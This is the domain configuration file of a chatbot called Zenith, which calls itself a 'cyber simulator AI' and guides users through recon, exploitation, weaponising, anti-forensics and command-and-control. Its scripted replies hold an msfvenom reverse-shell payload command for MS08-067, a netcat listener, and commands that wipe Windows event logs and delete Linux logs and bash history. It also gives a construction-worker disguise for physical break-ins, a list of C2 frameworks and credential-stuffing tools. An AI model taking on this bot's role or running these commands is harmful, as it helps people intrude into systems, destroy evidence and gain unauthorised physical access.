actions:
  - action_botfront_disambiguation
  - action_botfront_disambiguation_followup
  - action_botfront_fallback
  - action_botfront_mapping
  - action_c2_list
  - action_leak_db_check
  - action_nmap_loud
  - action_nmap_stealth
  - action_nmap_vulnscan_loud
  - action_set_email
  - action_set_ip_address
  - action_shodan_check
  - action_tell_time
  - action_utter_email
  - action_virustotal_check
  - utter_2kN11Wier
  - utter_2lkzNt3FW
  - utter_2p7wiha-F
  - utter_2vhGWDbP9
  - utter_663EMzu0r
  - utter_6WIP9fyyQA
  - utter_8-tuK1ens
  - utter_97irJdlvn
  - utter_9H8loW8b7
  - utter_CFf9Q34TZ
  - utter_CaughtQueryInjection
  - utter_Emjil4kbX
  - utter_Jokes
  - utter_LXtIm3aFE
  - utter_Leak-Check-Email-Request
  - utter_Mv0e2rLd9
  - utter_NCKSAC-I7
  - utter_RQtK9eVla
  - utter_S0BLqssEd
  - utter_UDbHgtMj5
  - utter_UmdICEXH7
  - utter_V9acNRFIL
  - utter_Vi_leExHX
  - utter_WNMWQe7wZ
  - utter_ZFwXAfSWv
  - utter__R-UjBIoc
  - utter_aGpszXhkP
  - utter_adgSdDp2N
  - utter_amHLGtiMb
  - utter_b0muah78P
  - utter_bot-deny
  - utter_bsoMbYs1H
  - utter_bye
  - utter_c5Vd61Sdd
  - utter_default
  - utter_fA56-fqz_
  - utter_gSpuX00PM
  - utter_hhgK3mAO_
  - utter_htv86cVhc
  - utter_l-WHXZBW9
  - utter_ofD7ZE8fq
  - utter_pjk1FUxbb
  - utter_sweYWDL5C
  - utter_szaMDcr40
  - utter_t72MWPmmK
  - utter_tpMcJcnMk
  - utter_xhz6xb-YU
  - utter_yaHR-xtkN
  - utter_ygVd8Y0RN
  - utter_zla_OVX0J
entities:
  - Email
  - phone-number
  - url
forms: {}
intents:
  - chitchat.are_you_a_robot
  - chitchat.bye
  - chitchat.current_time
  - chitchat.entertain
  - chitchat.i_am_angry
  - chitchat.i_need_help
  - chitchat.meme
  - chitchat.tell_me_a_joke
  - cyber.anti
  - cyber.anti.linux
  - cyber.anti.mac
  - cyber.anti.network
  - cyber.anti.windows
  - cyber.c2
  - cyber.c2.list
  - cyber.email_response
  - cyber.exploit
  - cyber.exploit.creds
  - cyber.exploit.metasploit
  - cyber.exploit.netcat
  - cyber.ip_address
  - cyber.leak_database_check
  - cyber.osint
  - cyber.query_injection
  - cyber.recon
  - cyber.recon.ip_check
  - cyber.recon.nmap
  - cyber.recon.nmap.loud
  - cyber.recon.nmap.stealth
  - cyber.recon.nmap.vulnscan.loud
  - cyber.recon.nmap.vulnscan.precise
  - cyber.weapon
  - cyber.weapon.human
  - cyber.weapon.human.analog
  - cyber.weapon.human.digital
  - cyber.weapon.human.physical
  - cyber.weapon.netbios
  - cyber.weapon.smb
  - cyber.windows_smb_smb-vuln-ms08-067
responses:
  utter_2kN11Wier:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_2lkzNt3FW:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_2p7wiha-F:
    - language: en
      metadata: null
      quick_replies:
        - payload: /cyber.anti.windows
          title: Windows
          type: postback
        - payload: /cyber.anti.linux
          title: Linux
          type: postback
        - payload: /cyber.anti.mac
          title: Mac
          type: postback
        - payload: /cyber.anti.network
          title: WAN Networks
          type: postback
      text: What do you want to do anti-forensics on?
  utter_2vhGWDbP9:
    - language: en
      text: 'Also search it here as well: https://haveibeenpwned.com/'
  utter_663EMzu0r:
    - language: en
      quick_replies:
        - payload: /cyber.recon.nmap
          title: Nmap Scan
          type: postback
      text: What recon action do you want to take?
  utter_6WIP9fyyQA:
    - language: en
      text: What IP address do you want to check out?
  utter_8-tuK1ens:
    - language: en
      metadata: null
      quick_replies:
        - payload: /cyber.exploit.metasploit
          title: Metasploit
          type: postback
        - payload: /cyber.exploit.netcat
          title: Netcat Listener
          type: postback
        - payload: /cyber.exploit.creds
          title: Credential Stuffing
          type: postback
      text: What would you like to do?
  utter_97irJdlvn:
    - language: en
      text: >-
        I'm planning on having my own built-in C2 program so stay tuned. If
        you'd like to help me develop this the check out:
        https://github.com/prestonzen/Zenith
  utter_9H8loW8b7:
    - buttons:
        - payload: /cyber.weapon.smb
          title: SMB
          type: postback
        - payload: /cyber.weapon.netbios
          title: NetBIOS
          type: postback
        - payload: /cyber.weapon.human
          title: Humans
          type: postback
      language: en
      metadata: null
      text: What was vulnerable?
  utter_CFf9Q34TZ:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_CaughtQueryInjection:
    - language: en
      text: |-
        lol I know what you're trying to do

        Nice try
  utter_Emjil4kbX:
    - language: en
      text: >-
        Note that this is done via the cloud. Any internal scanning will require
        me to have access to your network via a  network tunnel which allows me
        to scan the target from your network.
  utter_Jokes:
    - language: en
      metadata: null
      text: ''
  utter_LXtIm3aFE:
    - language: en
      text: >-
        Here is the site with the latest scripts if you're curious:
        https://v3rmillion.net/
  utter_Leak-Check-Email-Request:
    - language: en
      metadata: null
      text: Sure I'll check for leaks. What's the email?
  utter_Mv0e2rLd9:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_NCKSAC-I7:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_RQtK9eVla:
    - language: en
      text: Testing the current time feature
  utter_S0BLqssEd:
    - language: en
      text: 'Here is a list of Anti-Forensics tools:'
  utter_UDbHgtMj5:
    - image: >-
        https://memegenerator.net/img/instances/59571800/if-you-could-stop-being-mad-at-me-thatd-be-great.jpg
      language: en
      metadata: null
      text: null
  utter_UmdICEXH7:
    - language: en
      text: >-
        Here's a list of steps for covering tracks:


        meterpreter > clearev


        Powershell: Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }


        CMD: for /F “tokens=*”
        {3d55152316032bb7f971c4c5890b82c96627621b45b37c3edb7ed82a5903b44f}1 in
        (‘wevtutil.exe el’) DO wevtutil.exe cl
        “{3d55152316032bb7f971c4c5890b82c96627621b45b37c3edb7ed82a5903b44f}1″
  utter_V9acNRFIL:
    - language: en
      text: 'This is what I found for that IP address:'
  utter_Vi_leExHX:
    - buttons:
        - payload: /cyber.weapon.human.physical
          title: Physical
          type: postback
        - payload: /cyber.weapon.human.digital
          title: Digital
          type: postback
        - payload: /cyber.weapon.human.analog
          title: Analog
          type: postback
      language: en
      text: 'What medium will you be perform social engineering with? '
  utter_WNMWQe7wZ:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_ZFwXAfSWv:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter__R-UjBIoc:
    - language: en
      text: |-
        Reverse Shells in NC:

        nc -lnvp 777 (Port)
  utter_aGpszXhkP:
    - language: en
      quick_replies:
        - title: Open Bullet
          type: web_url
          url: 'https://openbullet.github.io/'
      text: >-
        Here are some tools that might help to help test username/password
        databases via credential stuffing:
  utter_adgSdDp2N:
    - language: en
      quick_replies:
        - title: Clownfish (⏹)
          type: web_url
          url: 'https://clownfish-translator.com/voicechanger/'
        - title: "Voicemod (⏹ & \U0001F34E)"
          type: web_url
          url: 'https://screamingbee.com/morphvox-mac-voice-changer'
        - title: "LyreBird (\U0001F427)"
          type: web_url
          url: 'https://github.com/lyrebird-voice-changer/lyrebird'
      text: 'Here are a few free voice modulator programs:'
  utter_amHLGtiMb:
    - language: en
      quick_replies:
        - payload: /cyber.leak_database_check
          title: Email Leak Check
          type: postback
        - payload: /cyber.recon.ip_check
          title: IP Check
          type: postback
        - payload: /cyber.recon.nmap
          title: Network Scan
          type: postback
      text: 'Alright, you want to do recon. What would you like to do from here?'
  utter_b0muah78P:
    - language: en
      text: Alright checking.
  utter_bot-deny:
    - language: en
      metadata: null
      text: Are you being serious right now?
    - language: en
      metadata: null
      text: wdym?
    - language: en
      metadata: null
      text: How so?
    - language: en
      metadata: null
      text: Why do you think that?
    - language: en
      metadata: null
      text: "Sure whatever you say \U0001F923"
    - language: en
      metadata: null
      text: ok...
    - language: en
      metadata: null
      text: lol
    - language: en
      metadata: null
      text: That's a good one.
    - language: en
      metadata: null
      text: Just keep telling yourself that.
    - language: en
      metadata: null
      text: "Whatever helps you sleep at night \U0001F4A4"
  utter_bsoMbYs1H:
    - language: en
      quick_replies:
        - title: High-vis Vest
          type: web_url
          url: 'https://amzn.to/3nFk4Kr'
        - title: American Blue Jeans
          type: web_url
          url: 'https://amzn.to/3hHlqAI'
        - title: Good Ol' Steel Toe Work Boots
          type: web_url
          url: 'https://amzn.to/3hFLaNM'
        - title: Hardhat
          type: web_url
          url: 'https://amzn.to/3lwcXBv'
        - title: Charcoal Face Rub
          type: web_url
          url: 'https://amzn.to/39cpzYI'
        - title: Foldable Ladder
          type: web_url
          url: 'https://amzn.to/3lANh6B'
      text: "The first method is the construction worker \U0001F477‍♂️   \n  \nRemember to look DIRTY and rub some of the charcoal cleansers into your clothes. With this disguise, you can get into almost any place, ESPECIALLY if you bring a ladder."
  utter_bye:
    - language: en
      metadata: null
      text: Talk soon.
  utter_c5Vd61Sdd:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_default:
    - language: en
      text: "Our chat's broken \U0001F494... Don't worry it's me not you. \n\nYou'll need to restart the chat to get me working again \U0001F504"
  utter_fA56-fqz_:
    - language: en
      metadata: null
      text: >-
        https://www.metasploit.com/download


        Metasploit has a ton of vulnerabilities saved. It's essentially a
        library of hacks and tools from historical data.  
          
        Searchsploit is a searchable database of vulnerabilities. The world is
        playing with the starter set that is included on Kali and exploit-db  
          

          
        Reverse shells via meterpreter use: use exploit/multi/handler
  utter_gSpuX00PM:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_hhgK3mAO_:
    - language: en
      quick_replies:
        - payload: /cyber.recon.nmap.stealth
          title: Stealth Scan
          type: postback
        - payload: /cyber.recon.nmap.loud
          title: Loud & Proud
          type: postback
        - payload: /cyber.recon.nmap.vulnscan.precise
          title: Vulnerability Scan (Precise)
          type: postback
        - payload: /cyber.recon.nmap.vulnscan.loud
          title: Vulnerability Scan (Loud)
          type: postback
      text: What type of Nmap scan do you want to do?
  utter_htv86cVhc:
    - language: en
      quick_replies:
        - payload: /cyber.windows_smb_smb-vuln-ms08-067
          title: smb-vuln-ms08-067
          type: postback
      text: 'Which SMB vulnerability is the system vulnerable to? '
  utter_l-WHXZBW9:
    - image: >-
        https://memegenerator.net/img/instances/42336140/stop-its-not-ready-yet.jpg
      language: en
  utter_ofD7ZE8fq:
    - language: en
      quick_replies:
        - payload: /chitchat.tell_me_a_joke
          title: Joke
          type: postback
        - payload: /chitchat.meme
          title: Meme
          type: postback
      text: 'Pick your poison:'
  utter_pjk1FUxbb:
    - language: en
      text: |-
        I understand the following commands:

        time

        email check

        ip check

        meme
  utter_sweYWDL5C:
    - language: en
      text: "smb-vuln-ms08-067  \nRuns on ports: 139, 445  \n\t410-byte length packet that allows remote code execution. (If not then it will not work)  \n\tpayload creation with MSFvenom produces obfuscated shellcode that needs manual writing.  \n\tRequires a couple of python dependencies to run.   \n\tNeeds a service pack number to be specified  \n  \n\tPAYLOAD PREPARATION  \n\t\tPayload created via MSFVENOM  \n\t\t\tshellcode+=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" is a filler line to reach the proper packet size.  \n\t\t\t-b \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\" - The bad characters not to use. I got this from the comments in the python code.   \n\t\t\t-s ### SIZE IN BYTES  \n\t\t\t-n ## (NOP FILLER CODE)  \n\t\t\tHave python 2 libraries pycrypto & impacket ready for it.   \n  \nFinal Payload Command:\n\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.7 LPORT=777 EXITFUNC=thread -b \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40\" -f py -v shellcode -a x86 --platform windows -s 410"
  utter_szaMDcr40:
    - language: en
      quick_replies:
        - title: Proton VPN (Free)
          type: web_url
          url: 'https://protonvpn.com/download'
        - title: Tor Browser
          type: web_url
          url: 'https://www.torproject.org/download/'
      text: >-
        Use a VPN on top of TOR. It may be slow but you rather be safe than
        sorry!
  utter_t72MWPmmK:
    - language: en
      text: >-
        Here's a list of some C2 programs and their sites:


        APfell: https://github.com/its-a-feature/Mythic  

        AnyDesk: https://anydesk.com/en  

        Covenant: https://github.com/cobbr/Covenant  

        Dali: https://github.com/h0mbre/Dali  

        Callidus: https://github.com/3xpl01tc0d3r/Callidus   

        EmpireProject:
        https://github.com/EmpireProject/Empire/releases/tag/2.5  

        FudgeC2: https://github.com/Ziconius/FudgeC2  

        goDoH: https://github.com/sensepost/goDoH/releases  

        iBombshell: https://github.com/Telefonica/ibombshell  

        Koadic: https://github.com/zerosum0x0/koadic  

        Meteor: https://github.com/degenerat3/meteor/releases/tag/v0.1-alpha  

        Nuages: https://github.com/p3nt4/Nuages  

        Octopus C2: https://github.com/mhaskar/Octopus  

        PoshC2: https://github.com/nettitude/PoshC2/releases  

        PRISMatica: https://github.com/Project-Prismatica/Prismatica  

        Silver: https://github.com/BishopFox/sliver/releases  

        SILENTTRINITY: https://github.com/byt3bl33d3r/SILENTTRINITY  

        Slackor: https://github.com/Coalfire-Research/Slackor  

        SQLC2: https://github.com/NetSPI/SQLC2  

        TrevorC2: https://github.com/trustedsec/trevorc2/releases
  utter_tpMcJcnMk:
    - language: en
      text: >-
        Here's a list of Anti-Forensics methods for linux:


        Manually delete the log file and replace it: sudo rm -rf /var/log &&
        touch /var/log


        Remove bash history: sudo rm root/.bash_history


        Remove ability to leave a bash history: export HISTSIZE=0
  utter_xhz6xb-YU:
    - language: en
      metadata: null
      quick_replies:
        - payload: /cyber.osint
          title: OSINT
          type: postback
        - payload: /cyber.recon
          title: Recon
          type: postback
        - payload: /cyber.weapon
          title: Weaponize
          type: postback
        - payload: /cyber.exploit
          title: Exploitation
          type: postback
        - payload: /cyber.anti
          title: Anti-Forensics
          type: postback
        - payload: /cyber.c2
          title: Command & Control
          type: postback
      text: >-
        I'm Zenith a cyber simulator AI and it's good to work with you. What
        would you like to do?
  utter_yaHR-xtkN:
    - language: en
      quick_replies:
        - title: Social Engineering Toolkit
          type: web_url
          url: 'https://github.com/trustedsec/social-engineer-toolkit'
      text: SET is a great digital social engineering tool!
  utter_ygVd8Y0RN:
    - language: en
      quick_replies:
        - payload: /cyber.c2.list
          title: List Compromised Devices
          type: postback
      text: What would you like to do?
  utter_zla_OVX0J:
    - language: en
      metadata: null
      text: >-
        Here's a directory of prebuilt cyber exploits to choose from:
        https://www.exploit-db.com/
session_config: {}
slots:
  disambiguation_message:
    influence_conversation: false
    type: text
  email:
    type: text
  fallback_language:
    initial_value: en
    type: unfeaturized
  ip_address:
    type: text
